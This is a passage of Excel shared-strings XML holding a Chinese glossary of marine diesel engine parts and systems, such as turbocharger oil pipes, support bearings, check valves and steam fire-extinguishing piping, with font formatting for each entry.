      </rPr>
      <t>增压器主滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器转子清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器装配及阻断工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压伺服器的布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压系统工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摘要</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毡保护套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毡保护套总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毡垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>粘度控制单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>粘合</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硅橡胶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>张紧螺栓轴</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涨紧样板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>罩盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>罩壳连接侧上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>罩壳连接侧下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>振动补偿器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>振动测试的规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>振动极限值</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸气灭火管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸汽机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机比较</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸汽加热系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸汽空气清洗管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸汽灭火主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>整套垫圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>整体锻造曲轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>整体曲轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>证书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑薄板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑结构布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑螺栓安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑螺栓的壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑螺栓用钻头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑用支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑轴承铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑轴粗加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支承架上托架位置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支管，法兰连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架（工作台）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架，传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支柱</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支柱螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支柱轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支柱总成</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>执行器修理工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>执行器支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直对接板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直考克清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直连接件插头块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直式刮刀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直式联轴器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直式外螺纹螺栓接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直式销规</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通阀</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通锥阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动法兰，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动尖头螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动块的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动块液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动气缸的支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回瓣</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回阀安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回阀单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回阀阀座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回阀壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回阀模型</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回旋塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止推螺钉，推杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止推螺钉上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止推螺钉下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指令说明设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指南信息</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指示灯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指示信息</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
